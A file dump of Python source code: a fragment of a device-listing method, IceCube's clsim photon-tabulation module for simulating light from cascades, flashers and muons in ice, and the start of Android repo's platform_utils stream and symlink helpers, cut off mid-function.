self.dump(detected=True)
def dump(self, filtered=[], header=[], connected_only=False, detected=False):
print("")
table = []
if detected:
to_show = self.detected
else:
to_show = self.duts
if not header:
header = ["Platform", "ID", "Serial device"]
for p in to_show:
platform = p.platform
connected = p.connected
if filtered and platform not in filtered:
continue
if not connected_only or connected:
table.append([platform, p.id, p.serial])
print(tabulate(table, headers=header, tablefmt="github"))
|
tabulator.py
|
# Copyright (c) 2012
# Jakob van Santen <jvansanten@icecube.wisc.edu>
# Claudio Kopper <claudio.kopper@icecube.wisc.edu>
# and the IceCube Collaboration <http://www.icecube.wisc.edu>
#
# Permission to use, copy, modify, and/or distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
#
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
# SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN ACTION
# OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF OR IN
# CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
#
#
# $Id: tabulator.py 140305 2015-12-10 10:54:09Z jvansanten $
#
# @file tabulator.py
# @version $Revision: 140305 $
# @date $Date: 2015-12-10 05:54:09 -0500 (Thu, 10 Dec 2015) $
# @author Jakob van Santen
from __future__ import print_function
from icecube.icetray import I3Units, I3Module, traysegment
from icecube.dataclasses import I3Position, I3Particle, I3MCTree, I3Direction, I3Constants
from icecube.phys_services import I3Calculator, I3GSLRandomService
from icecube.clsim import I3CLSimFunctionConstant
from icecube.clsim import GetIceCubeDOMAcceptance, GetIceCubeDOMAngularSensitivity
from icecube.clsim import Gen2Sensors
from icecube.clsim import FlasherInfoVectToFlasherPulseSeriesConverter, I3CLSimFlasherPulse, I3CLSimFlasherPulseSeries
import numpy, math
from icecube.photospline import numpy_extensions # meshgrid_nd
from icecube.photospline.photonics import FITSTable, Efficiency, Geometry, Parity
def generate_seed():
import struct
with open('/dev/random') as rand:
return struct.unpack('I', rand.read(4))[0]
def makeFlasherPulse(x, y, z, zenith, azimuth, width, brightness, scale):
pulse = I3CLSimFlasherPulse()
pulse.type = I3CLSimFlasherPulse.FlasherPulseType.LED405nm
pulse.pos = I3Position(x, y, z)
pulse.dir = I3Direction(zenith, azimuth)
pulse.time = 0.
pulse.pulseWidth = (float(width)/2.)*I3Units.ns
lightscale = 1./(32582*5.21) # scale down to match 1 GeV equivalent electromagnetic cascade energy
pulse.numberOfPhotonsNoBias = 1.17e10*lightscale*scale*(0.0006753+0.00005593*float(brightness))*(float(width)+13.9-(57.5/(1.+float(brightness)/34.4)))
if numpy.abs(zenith - 90.*I3Units.degree) > 22.5*I3Units.degree:
tiltedFlasher = True # this is only a rough approximation to describe a tilted flasher
else:
tiltedFlasher = False
pulse.angularEmissionSigmaPolar = FlasherInfoVectToFlasherPulseSeriesConverter.LEDangularEmissionProfile[(pulse.type, tiltedFlasher)][0]
pulse.angularEmissionSigmaAzimuthal = FlasherInfoVectToFlasherPulseSeriesConverter.LEDangularEmissionProfile[(pulse.type, tiltedFlasher)][1]
return pulse
def unpin_threads(delay=60):
"""
When AMD OpenCL fissions the CPU device, it pins each sub-device to a
a physical core. Since we always use sub-device 0, this means that multiple
instances of the tabulator on a single machine will compete for core 0.
Reset thread affinity after *delay* seconds to prevent this from happening.
"""
import os
import subprocess
import threading
import time
def which(program):
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
def ext_candidates(fpath):
yield fpath
for ext in os.environ.get("PATHEXT", "").split(os.pathsep):
yield fpath + ext
fpath, fname = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ["PATH"].split(os.pathsep):
exe_file = os.path.join(path, program)
for candidate in ext_candidates(exe_file):
if is_exe(candidate):
return candidate
return None
def taskset(pid,tt=None):
# get/set the taskset affinity for pid
# uses a binary number string for the core affinity
l = [which('taskset'),'-p']
if tt:
l.append(hex(int(tt,2))[2:])
l.append(str(pid))
p = subprocess.Popen(l,stdout=subprocess.PIPE,stderr=subprocess.PIPE)
output = p.communicate()[0].split(':')[-1].strip()
if not tt:
return bin(int(output,16))[2:]
def resetTasksetThreads(main_pid):
# reset thread taskset affinity
time.sleep(delay)
num_cpus = reduce(lambda b,a: b+int('processor' in a),open('/proc/cpuinfo').readlines(),0)
tt = '1'*num_cpus
#tt = taskset(main_pid)
p = subprocess.Popen([which('ps'),'-Lo','tid','--no-headers','%d'%main_pid],stdout=subprocess.PIPE,stderr=subprocess.PIPE)
for tid in p.communicate()[0].split():
tid = tid.strip()
if tid:
taskset(tid,tt)
# only do this on linux
try:
open('/proc/cpuinfo')
except IOError:
return
# and only if taskset exists
if not which('taskset'):
return
threading.Thread(target=resetTasksetThreads,args=(os.getpid(),)).start()
from icecube.clsim import GetDefaultParameterizationList
from icecube.clsim import GetFlasherParameterizationList
from icecube.clsim import GetHybridParameterizationList
from icecube.clsim import AutoSetGeant4Environment
from icecube.clsim.traysegments.common import configureOpenCLDevices, parseIceModel
from icecube import icetray
from os.path import expandvars
@icetray.traysegment
def I3CLSimTabulatePhotons(tray, name,
UseCPUs=True,
UseGPUs=False,
UseOnlyDeviceNumber=None,
MCTreeName="I3MCTree",
OutputMCTreeName=None,
FlasherInfoVectName=None,
FlasherPulseSeriesName=None,
MMCTrackListName="MMCTrackList",
ParallelEvents=1000,
RandomService=None,
MediumProperties=expandvars("$I3_BUILD/ice-models/resources/models/spice_mie"),
UseGeant4=False,
CrossoverEnergyEM=None,
CrossoverEnergyHadron=None,
UseCascadeExtension=False,
DoNotParallelize=False,
Area=None,
WavelengthAcceptance=None,
AngularAcceptance=None,
UseHoleIceParameterization=True,
OverrideApproximateNumberOfWorkItems=None,
ExtraArgumentsToI3CLSimModule=dict(),
If=lambda f: True
):
"""Do standard clsim processing up to the I3Photon level.
These photons still need to be converted to I3MCPEs to be usable
for further steps in the standard IceCube MC processing chain.
Reads its particles from an I3MCTree and writes an I3PhotonSeriesMap.
All available OpenCL GPUs (and optionally CPUs) will
be used. This will take over your entire machine,
so make sure to configure your batch jobs correctly
when using this on a cluster.
When using nVidia cards, you can set the
CUDA_VISIBLE_DEVICES environment variable to
limit GPU visibility. A setting of
CUDA_VISIBLE_DEVICES="0,3" would only use cards
#0 and #3 and ignore cards #1 and #2. In case you are
using a batch system, chances are this variable is already
set. Unfortunately, there is no corresponding setting
for the AMD driver.
This segment assumes that MMC has been applied to the
I3MCTree and that MMC was *NOT* run using the "-recc" option.
:param UseCPUs:
Turn this on to also use CPU-based devices.
(This may potentially slow down photon generation, which
is also done on the CPU in parallel.)
:param UseGPUs:
Turn this off to not use GPU-based devices.
This may be useful if your GPU is used for display
purposes and you don't want it to slow down.
:param UseOnlyDeviceNumber:
Use only a single device number, even if there is more than
one device found matching the required description. The numbering
starts at 0.
:param MCTreeName:
The name of the I3MCTree containing the particles to propagate.
:param OutputMCTreeName:
A copy of the (possibly sliced) MCTree will be stored as this name.
:param FlasherInfoVectName:
Set this to the name of I3FlasherInfoVect objects in the frame to
enable flasher simulation. The module will read I3FlasherInfoVect objects
and generate photons according to assumed parameterizations.
:param FlasherPulseSeriesName:
Set this to the name of an I3CLSimFlasherPulseSeries object in the frame to
enable flasher/Standard Candle simulation.
This cannot be used at the same time as FlasherInfoVectName.
(I3CLSimFlasherPulseSeries objects are clsim's internal flasher
representation, if "FlasherInfoVectName" is used, the I3FlasherInfoVect
objects are converted to I3CLSimFlasherPulseSeries objects.)
:param MMCTrackListName:
Only used if *ChopMuons* is active. Set it to the name
of the I3MMCTrackList object that contains additional
muon energy loss information.
:param ParallelEvents:
clsim will work on a couple of events in parallel in order
not to starve the GPU. Setting this too high will result
in excessive memory usage (all your frames have to be cached
in RAM). Setting it too low may impact simulation performance.
The optimal value depends on your energy distribution/particle type.
:param RandomService:
Set this to an instance of a I3RandomService. Alternatively,
you can specify the name of a configured I3RandomServiceFactory
added to I3Tray using tray.AddService(). If you don't configure
this, the default I3RandomServiceFactory will be used.
:param MediumProperties:
Set this either to a directory containing a PPC-compatible
ice description (icemodel.dat, icemodel.par and cfg.txt) or
to a photonics ice table file. PPC-compatible ice files should
generally lead to faster execution times on GPUs since it involves
less interpolation between table entries (the PPC ice-specification
is parametric w.r.t. wavelength, whereas the photonics specification
is not).
:param Area:
Geometric area of the sensor. If None, use the area of an IceCube DOM
:param WavelengthAcceptance:
Quantum efficiency of the sensor, relative to the geometric area. If
None, use the IceCube DOM (standard QE)
:param AngularAcceptance:
Efficiency as a function of polar angle, relative to the geometric area.
If None, use the IceCube angular efficiency, assuming hole ice.
:param UseGeant4:
Enabling this setting will disable all cascade and muon light yield
parameterizations. All particles will sent to Geant4 for a full
simulation. This does **not** apply to muons that do have a length
assigned. These are assumed to have been generated by MMC and
their light is generated according to the usual parameterization.
:param CrossoverEnergyEM:
If set it defines the crossover energy between full Geant4 simulations and
light yield parameterizations for electro magnetic cascades. This only works
when UseGeant4 is set to true. It works in conjunction with CrossoverEnergyHadron.
If one of both is set to a positiv value greater 0 (GeV), the hybrid simulation
is used.
If CrossoverEnergyEM is set to None while CrossoverEnergyHadron is set so
hybrid mode is working, GEANT4 is used for EM cascades.
If CrossoverEnergyEM is set to 0 (GeV) while CrossoverEnergyHadron is set
so hybrid mode is working, leptons and EM cascades will use parameterizations
for the whole energy range.
:param CrossoverEnergyHadron:
If set it defines the crossover energy between full Geant4 simulations and
light yield parameterizations for hadronic cascades. This only works when
UseGeant4 is set to true. It works in conjunction with CrossoverEnergyEM.
If one of both is set to a positiv value greater 0 (GeV), the hybrid simulation
is used.
If CrossoverEnergyHadron is set to None while CrossoverEnergyEM is set so
hybrid mode is working, GEANT4 is used for hadronic cascades.
If CrossoverEnergyHadron is set to 0 (GeV) while CrossoverEnergyHadron is
set so hybrid mode is working, hadronic cascades will use parameterizations
for the whole energy range.
:param UseCascadeExtension:
If True, simulate the longitudinal development of cascades. Otherwise,
simulate cascades as pointlike objects.
:param DoNotParallelize:
Try only using a single work item in parallel when running the
OpenCL simulation. This might be useful if you want to run jobs
in parallel on a batch system. This will only affect CPUs and
will be a no-op for GPUs.
:param OverrideApproximateNumberOfWorkItems:
Allows to override the auto-detection for the maximum number of parallel work items.
You should only change this if you know what you are doing.
:param If:
Python function to use as conditional execution test for segment modules.
"""
from icecube import icetray, dataclasses, phys_services, clsim
# make sure the geometry is updated to the new granular format (in case it is supported)
if hasattr(dataclasses, "I3ModuleGeo"):
tray.AddModule("I3GeometryDecomposer", name + "_decomposeGeometry",
If=lambda frame: If(frame) and ("I3OMGeoMap" not in frame))
if UseGeant4:
if not clsim.I3CLSimLightSourceToStepConverterGeant4.can_use_geant4:
raise RuntimeError("You have requested to use Geant 4, but clsim was compiled without Geant 4 support")
# at the moment the Geant4 paths need to be set, even if it isn't used
# TODO: fix this
if clsim.I3CLSimLightSourceToStepConverterGeant4.can_use_geant4:
AutoSetGeant4Environment()
if MMCTrackListName is None or MMCTrackListName=="":
# the input does not seem to have been processed by MMC
ChopMuons = False
else:
ChopMuons = True
if MCTreeName is None or MCTreeName=="":
clSimMCTreeName=""
if ChopMuons:
raise RuntimeError("You cannot have \"MMCTrackListName\" enabled with no MCTree!")
else:
clSimMCTreeName=MCTreeName
if FlasherInfoVectName is None or FlasherInfoVectName=="":
if (FlasherPulseSeriesName is not None) and (FlasherPulseSeriesName!=""):
SimulateFlashers=True
clSimFlasherPulseSeriesName = FlasherPulseSeriesName
clSimOMKeyMaskName = ""
else:
SimulateFlashers=False
clSimFlasherPulseSeriesName = ""
clSimOMKeyMaskName = ""
else:
if (FlasherPulseSeriesName is not None) and (FlasherPulseSeriesName!=""):
raise RuntimeError("You cannot use the FlasherPulseSeriesName and FlasherInfoVectName parameters at the same time!")
SimulateFlashers=True
clSimFlasherPulseSeriesName = FlasherInfoVectName + "_pulses"
clSimOMKeyMaskName = FlasherInfoVectName + "_OMKeys"
tray.AddModule(clsim.FlasherInfoVectToFlasherPulseSeriesConverter,
name + "_FlasherInfoVectToFlasherPulseSeriesConverter",
FlasherInfoVectName = FlasherInfoVectName,
FlasherPulseSeriesName = clSimFlasherPulseSeriesName,
FlasherOMKeyVectName = clSimOMKeyMaskName,
If=If)
# (optional) pre-processing
if ChopMuons:
if OutputMCTreeName is not None:
clSimMCTreeName_new = OutputMCTreeName
else:
clSimMCTreeName_new = clSimMCTreeName + "_sliced"
tray.AddModule("I3MuonSlicer", name + "_chopMuons",
InputMCTreeName=clSimMCTreeName,
MMCTrackListName=MMCTrackListName,
OutputMCTreeName=clSimMCTreeName_new,
If=If)
clSimMCTreeName = clSimMCTreeName_new
else:
if (OutputMCTreeName is not None) and (OutputMCTreeName != ""):
# copy the MCTree to the requested output name
def copyMCTree(frame, inputName, outputName, If_=None):
if If_ is not None:
if not If_(frame): return
frame[outputName] = frame[inputName]
tray.AddModule(copyMCTree, name + "_copyMCTree",
inputName=clSimMCTreeName,
outputName=OutputMCTreeName,
Streams=[icetray.I3Frame.DAQ],
If_=If)
clSimMCTreeName = OutputMCTreeName
else:
clSimMCTreeName = clSimMCTreeName
# some constants
DOMRadius = 0.16510*icetray.I3Units.m # 13" diameter
if Area is None:
referenceArea = dataclasses.I3Constants.pi*DOMRadius**2
else:
referenceArea = Area
if WavelengthAcceptance is None:
domAcceptance = clsim.GetIceCubeDOMAcceptance(domRadius=DOMRadius)
else:
domAcceptance = WavelengthAcceptance
if AngularAcceptance is None:
angularAcceptance = clsim.GetIceCubeDOMAngularSensitivity(holeIce=expandvars("$I3_SRC/ice-models/resources/models/angsens/as.h2-50cm"))
else:
angularAcceptance = AngularAcceptance
# muon&cascade parameterizations
ppcConverter = clsim.I3CLSimLightSourceToStepConverterPPC(photonsPerStep=200)
ppcConverter.SetUseCascadeExtension(UseCascadeExtension)
if not UseGeant4:
particleParameterizations = GetDefaultParameterizationList(ppcConverter, muonOnly=False)
else:
if CrossoverEnergyEM>0 or CrossoverEnergyHadron>0:
particleParameterizations = GetHybridParameterizationList(ppcConverter, CrossoverEnergyEM=CrossoverEnergyEM, CrossoverEnergyHadron=CrossoverEnergyHadron)
elif MMCTrackListName is None or MMCTrackListName=="":
particleParameterizations = [] # make sure absolutely **no** parameterizations are used
else:
# use no parameterizations except for muons with lengths assigned to them
# (those are assumed to have been generated by MMC)
particleParameterizations = GetDefaultParameterizationList(ppcConverter, muonOnly=True)
# flasher parameterizations
if SimulateFlashers:
# this needs a spectrum table in order to pass spectra to OpenCL
spectrumTable = clsim.I3CLSimSpectrumTable()
particleParameterizations += GetFlasherParameterizationList(spectrumTable)
icetray.logging.log_debug("number of spectra (1x Cherenkov + Nx flasher): %d" % len(spectrumTable), unit="clsim")
else:
# no spectrum table is necessary when only using the Cherenkov spectrum
spectrumTable = None
openCLDevices = configureOpenCLDevices(
UseGPUs=UseGPUs,
UseCPUs=UseCPUs,
OverrideApproximateNumberOfWorkItems=OverrideApproximateNumberOfWorkItems,
DoNotParallelize=DoNotParallelize,
UseOnlyDeviceNumber=UseOnlyDeviceNumber
)
tray.AddModule("I3CLSimTabulatorModule", name + "_clsim",
MCTreeName=clSimMCTreeName,
RandomService=RandomService,
MediumProperties=MediumProperties,
SpectrumTable=spectrumTable,
FlasherPulseSeriesName=clSimFlasherPulseSeriesName,
Area=referenceArea,
WavelengthAcceptance=domAcceptance,
AngularAcceptance=angularAcceptance,
ParameterizationList=particleParameterizations,
# MaxNumParallelEvents=ParallelEvents,
OpenCLDeviceList=openCLDevices,
**ExtraArgumentsToI3CLSimModule
)
unpin_threads()
@traysegment
def TabulatePhotonsFromSource(tray, name, PhotonSource="cascade", Zenith=0.*I3Units.degree, Azimuth=0.*I3Units.degree, ZCoordinate=0.*I3Units.m,
Energy=1.*I3Units.GeV, FlasherWidth=127, FlasherBrightness=127, Seed=12345, NEvents=100,
IceModel='spice_mie', DisableTilt=False, Filename="", TabulateImpactAngle=False,
PhotonPrescale=1, Axes=None, Directions=None, Sensor='DOM', RecordErrors=False):
"""
Tabulate the distribution of photoelectron yields on IceCube DOMs from various
light sources. The light profiles of the sources are computed from the same
parameterizations used in PPC, but like in the direct propagation mode can
be computed using GEANT4 instead.
The mode of tabulation is controlled primarily by the **PhotonSource** parameter.
- *'cascade'* will simulate an electromagnetic cascade of **Energy** GeV at
(0, 0, **ZCoordinate**), oriented according to **Zenith** and **Azimuth**.
The default coordinate system is spherical and centered the given vertex,
with 200 quadratically spaced bins in radius, 36 linear bins in azimuthal
angle (only from 0 to 180 degrees by default), 100 linear bins in the
cosine of the polar angle, and 105 quadratic bins in time residual w.r.t
the direct path from (0, 0, **ZCoordinate**).
- *'flasher'* will simulate a 405 nm LED flasher pulse with the given
**FlasherWidth** and **FlasherBrightness** settings. The source position
and coordinate system are the same as for the 'cascade' case.
- *'infinite-muon'* will simulate a "bare" muon of infinite length. The
coordinate system is cylindrical and centered on the axis of the muon.
Since the muon's position is degenerate with time, the usual parallel
distance is replaced by the z coordinate of the closest approach to the
detection position, and the starting positions of the simulated muons are
sampled randomly (**ZCoordinate** is ignored). There are 100 quadratic
bins in perpendicular distance to the source axis, 36 linear bins in
azimuthal angle (0 to :math:`\pi` radians), 100 linear bins in z
coordinate of closest approach, and 105 quadratic bins in time residual
w.r.t. the earliest possible Cherenkov photon.
:param PhotonSource: the type of photon source ('cascade', 'flasher', or 'infinite-muon').
:param Zenith: the orientation of the source
:param ZCoordinate: the depth of the source
:param Energy: the energy of the source (only for cascade tables)
:param FlasherWidth: the width of the flasher pulse (only for flasher tables)
:param FlasherBrightness: the brightness of the flasher pulse (only for flasher tables)
:param Seed: the seed for the random number service
:param NEvents: the number of events to simulate
:param RecordErrors: record the squares of weights as well (useful for error bars)
:param IceModel: the path to an ice model in $I3_BUILD/ice-models/resources/models. Likely values include:
'spice_mie' ppc-style SPICE-Mie parametrization
:param DisableTilt: if true, disable tilt in ice model
:param Filename: the name of the FITS file to write
:param TabulateImpactAngle: if True, tabulate the impact position of the
photon on the DOM instead of weighting by the DOM's angular acceptance
:param Axes: a subclass of :cpp:class:`clsim::tabulator::Axes` that defines the coordinate system.
If None, an appropriate default will be chosen based on **PhotonSource**.
:param Directions: a set of directions to allow table generation for multiple sources.
If None, only one direction given by **Zenith** and **Azimuth** is used.
"""
# check sanity of args
PhotonSource = PhotonSource.lower()
if PhotonSource not in ['cascade', 'flasher', 'infinite-muon']:
raise ValueError("photon source %s is unknown. Please specify either 'cascade', 'flasher', or 'infinite-muon'" % PhotonSource)
from icecube import icetray, dataclasses, dataio, phys_services, sim_services, clsim
from os.path import expandvars
# a random number generator
randomService = phys_services.I3GSLRandomService(Seed)
tray.AddModule("I3InfiniteSource",name+"streams",
Stream=icetray.I3Frame.DAQ)
tray.AddModule("I3MCEventHeaderGenerator",name+"gen_header",
Year=2009,
DAQTime=158100000000000000,
RunNumber=1,
EventID=1,
IncrementEventID=True)
if Directions is None:
Directions = numpy.asarray([(Zenith, Azimuth)])
if PhotonSource in ('cascade', 'flasher', 'muon-segment'):
if PhotonSource == 'muon-segment':
ptype = I3Particle.ParticleType.MuMinus
else:
ptype = I3Particle.ParticleType.EMinus
def reference_source(zenith, azimuth, scale):
source = I3Particle()
source.type = ptype
source.energy = Energy*scale
source.pos = I3Position(0., 0., ZCoordinate)
source.dir = I3Direction(zenith, azimuth)
source.time = 0.
if PhotonSource == 'muon-segment':
source.length = 3.
else:
source.length = 0.
source.location_type = I3Particle.LocationType.InIce
return source
elif PhotonSource == 'infinite-muon':
from icecube import MuonGun
# pad depth to ensure that the track appears effectively infinite
surface = MuonGun.Cylinder(1800, 800)
# account for zenith-dependent distribution of track lengths
length_scale = surface.area(dataclasses.I3Direction(0, 0))/surface.area(dataclasses.I3Direction(Zenith, 0))
ptype = I3Particle.ParticleType.MuMinus
def reference_source(zenith, azimuth, scale):
source = I3Particle()
source.type = ptype
source.energy = Energy*scale
source.dir = I3Direction(zenith, azimuth)
source.pos = surface.sample_impact_position(source.dir, randomService)
crossings = surface.intersection(source.pos, source.dir)
source.length = crossings.second-crossings.first
source.time = 0.
source.location_type = I3Particle.LocationType.InIce
return source
import copy
class MakeParticle(icetray.I3Module):
def __init__(self, ctx):
super(MakeParticle,self).__init__(ctx)
self.AddOutBox("OutBox")
self.AddParameter("SourceFunction", "", lambda : None)
self.AddParameter("NEvents", "", 100)
def Configure(self):
self.reference_source = self.GetParameter("SourceFunction")
self.nevents = self.GetParameter("NEvents")
self.emittedEvents = 0
def DAQ(self, frame):
if PhotonSource != "flasher":
primary = I3Particle()
mctree = I3MCTree()
mctree.add_primary(primary)
for zenith, azimuth in Directions:
source = self.reference_source(zenith, azimuth, 1./len(Directions))
mctree.append_child(primary, source)
frame["I3MCTree"] = mctree
# use the emitting particle as a geometrical reference
frame["ReferenceParticle"] = source
else:
pulseseries = I3CLSimFlasherPulseSeries()
for zenith, azimuth in Directions:
pulse = makeFlasherPulse(0, 0, ZCoordinate, zenith, azimuth, FlasherWidth, FlasherBrightness, 1./len(Directions))
pulseseries.append(pulse)
frame["I3FlasherPulseSeriesMap"] = pulseseries
frame["ReferenceParticle"] = self.reference_source(Zenith, Azimuth, 1.)
self.PushFrame(frame)
self.emittedEvents += 1
if self.emittedEvents >= self.nevents:
self.RequestSuspension()
tray.AddModule(MakeParticle, SourceFunction=reference_source, NEvents=NEvents)
if PhotonSource == "flasher":
flasherpulse = "I3FlasherPulseSeriesMap"
mctree = None
else:
flasherpulse = None
mctree = "I3MCTree"
header = dict(FITSTable.empty_header)
header['zenith'] = Zenith/I3Units.degree
header['azimuth'] = Azimuth/I3Units.degree
header['z'] = ZCoordinate
header['energy'] = Energy
header['type'] = int(ptype)
header['efficiency'] = Efficiency.RECEIVER | Efficiency.WAVELENGTH
if PhotonSource == 'infinite-muon':
header['n_events'] = length_scale*NEvents/float(PhotonPrescale)
if Axes is None:
if PhotonSource != "infinite-muon":
dims = [
clsim.tabulator.PowerAxis(0, 580, 200, 2),
clsim.tabulator.LinearAxis(0, 180, 36),
clsim.tabulator.LinearAxis(-1, 1, 100),
clsim.tabulator.PowerAxis(0, 7e3, 105, 2),
]
geo = clsim.tabulator.SphericalAxes
else:
dims = [
clsim.tabulator.PowerAxis(0, 580, 100, 2),
clsim.tabulator.LinearAxis(0, numpy.pi, 36),
clsim.tabulator.LinearAxis(-8e2, 8e2, 80),
clsim.tabulator.PowerAxis(0, 7e3, 105, 2),
]
geo = clsim.tabulator.CylindricalAxes
# Add a dimension for the impact angle
if TabulateImpactAngle:
dims.append(clsim.tabulator.LinearAxis(-1, 1, 20))
Axes = geo(dims)
if PhotonSource == "flasher":
header['flasherwidth'] = FlasherWidth
header['flasherbrightness'] = FlasherBrightness
# some constants
DOMRadius = 0.16510*icetray.I3Units.m # 13" diameter
referenceArea = dataclasses.I3Constants.pi*DOMRadius**2
# NB: GetIceCubeDOMAcceptance() calculates the quantum efficiency by
# dividing the geometric area (a circle of radius domRadius) by the
# tabulated effective area. Scaling that radius by *sqrt(prescale)*
# _reduces_ the effective quantum efficiency by a factor *prescale*.
# Since we draw photons directly from the QE-weighted Cherenkov
# spectrum, this causes *prescale* fewer photons to be progagated per
# light source. We compensate by dividing the number of events by
# *prescale* in the header above.
# to be propagated per light source.
domAcceptance = clsim.GetIceCubeDOMAcceptance(domRadius=math.sqrt(PhotonPrescale)*DOMRadius)
if Sensor.lower() == 'dom':
angularAcceptance = clsim.GetIceCubeDOMAngularSensitivity(holeIce=expandvars("$I3_SRC/ice-models/resources/models/angsens/as.h2-50cm"))
elif Sensor.lower() == 'degg':
referenceArea = dataclasses.I3Constants.pi*(300.*I3Units.mm/2)**2
angularAcceptance = Gen2Sensors.GetDEggAngularSensitivity(pmt='both')
domAcceptance = Gen2Sensors.GetDEggAcceptance(active_fraction=1./PhotonPrescale)
elif Sensor.lower() == 'wom':
# outer diameter of the pressure vessel is 11.4 cm, walls are 9 mm thick
referenceArea = (11-2*0.9)*90*icetray.I3Units.cm2
angularAcceptance = Gen2Sensors.GetWOMAngularSensitivity()
domAcceptance = Gen2Sensors.GetWOMAcceptance(active_fraction=1./PhotonPrescale)
else:
raise ValueError("Don't know how to simulate %ds yet" % (sensor))
tray.AddSegment(I3CLSimTabulatePhotons, name+"makeCLSimPhotons",
MCTreeName = mctree, # if source is a cascade this will point to the I3MCTree
FlasherPulseSeriesName = flasherpulse, # if source is a flasher this will point to the I3CLSimFlasherPulseSeries
MMCTrackListName = None, # do NOT use MMC
ParallelEvents = 1, # only work at one event at a time (it'll take long enough)
RandomService = randomService,
# UnWeightedPhotons=True,
UseGPUs=False, # table-making is not a workload particularly suited to GPUs
UseCPUs=True, # it should work fine on CPUs, though
Area=referenceArea,
WavelengthAcceptance=domAcceptance,
AngularAcceptance=angularAcceptance,
DoNotParallelize=True, # no multithreading
UseGeant4=False,
OverrideApproximateNumberOfWorkItems=1, # if you *would* use multi-threading, this would be the maximum number of jobs to run in parallel (OpenCL is free to split them)
ExtraArgumentsToI3CLSimModule=dict(Filename=Filename, TableHeader=header,
Axes=Axes, PhotonsPerBunch=200, EntriesPerPhoton=5000, RecordErrors=RecordErrors),
MediumProperties=parseIceModel(expandvars("$I3_BUILD/ice-models/resources/models/" + IceModel), disableTilt=DisableTilt),
)
|
platform_utils.py
|
# -*- coding:utf-8 -*-
#
# Copyright (C) 2016 The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import errno
import os
import platform
import select
import shutil
import stat
from pyversion import is_python3
if is_python3():
from queue import Queue
else:
from Queue import Queue
from threading import Thread
def isWindows():
""" Returns True when running with the native port of Python for Windows,
False when running on any other platform (including the Cygwin port of
Python).
"""
# Note: The cygwin port of Python returns "CYGWIN_NT_xxx"
return platform.system() == "Windows"
class FileDescriptorStreams(object):
""" Platform agnostic abstraction enabling non-blocking I/O over a
collection of file descriptors. This abstraction is required because
fctnl(os.O_NONBLOCK) is not supported on Windows.
"""
@classmethod
def create(cls):
""" Factory method: instantiates the concrete class according to the
current platform.
"""
if isWindows():
return _FileDescriptorStreamsThreads()
else:
return _FileDescriptorStreamsNonBlocking()
def __init__(self):
self.streams = []
def add(self, fd, dest, std_name):
""" Wraps an existing file descriptor as a stream.
"""
self.streams.append(self._create_stream(fd, dest, std_name))
def remove(self, stream):
""" Removes a stream, when done with it.
"""
self.streams.remove(stream)
@property
def is_done(self):
""" Returns True when all streams have been processed.
"""
return len(self.streams) == 0
def select(self):
""" Returns the set of streams that have data available to read.
The returned streams each expose a read() and a close() method.
When done with a stream, call the remove(stream) method.
"""
raise NotImplementedError
def _create_stream(self, fd, dest, std_name):
""" Creates a new stream wrapping an existing file descriptor.
"""
raise NotImplementedError
class _FileDescriptorStreamsNonBlocking(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that support
non blocking I/O.
"""
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.set_non_blocking()
def set_non_blocking(self):
import fcntl
flags = fcntl.fcntl(self.fd, fcntl.F_GETFL)
fcntl.fcntl(self.fd, fcntl.F_SETFL, flags | os.O_NONBLOCK)
def fileno(self):
return self.fd.fileno()
def read(self):
return self.fd.read(4096)
def close(self):
self.fd.close()
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name)
def select(self):
ready_streams, _, _ = select.select(self.streams, [], [])
return ready_streams
class _FileDescriptorStreamsThreads(FileDescriptorStreams):
""" Implementation of FileDescriptorStreams for platforms that don't support
non blocking I/O. This implementation requires creating threads issuing
blocking read operations on file descriptors.
"""
def __init__(self):
super(_FileDescriptorStreamsThreads, self).__init__()
# The queue is shared accross all threads so we can simulate the
# behavior of the select() function
self.queue = Queue(10) # Limit incoming data from streams
def _create_stream(self, fd, dest, std_name):
return self.Stream(fd, dest, std_name, self.queue)
def select(self):
# Return only one stream at a time, as it is the most straighforward
# thing to do and it is compatible with the select() function.
item = self.queue.get()
stream = item.stream
stream.data = item.data
return [stream]
class QueueItem(object):
""" Item put in the shared queue """
def __init__(self, stream, data):
self.stream = stream
self.data = data
class Stream(object):
""" Encapsulates a file descriptor """
def __init__(self, fd, dest, std_name, queue):
self.fd = fd
self.dest = dest
self.std_name = std_name
self.queue = queue
self.data = None
self.thread = Thread(target=self.read_to_queue)
self.thread.daemon = True
self.thread.start()
def close(self):
self.fd.close()
def read(self):
data = self.data
self.data = None
return data
def read_to_queue(self):
""" The thread function: reads everything from the file descriptor into
the shared queue and terminates when reaching EOF.
"""
for line in iter(self.fd.readline, b''):
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, line))
self.fd.close()
self.queue.put(_FileDescriptorStreamsThreads.QueueItem(self, None))
def symlink(source, link_name):
"""Creates a symbolic link pointing to source named link_name.
Note: On Windows, source must exist on disk, as the implementation needs
to know whether to create a "File" or a "Directory" symbolic link.
"""
if isWindows():
import platform_utils_win32
source = _validate_winpath(source)
link_name = _validate_winpath(link_name)
target = os.path.join(os.path.dirname(link_name), source)
if isdir(target):
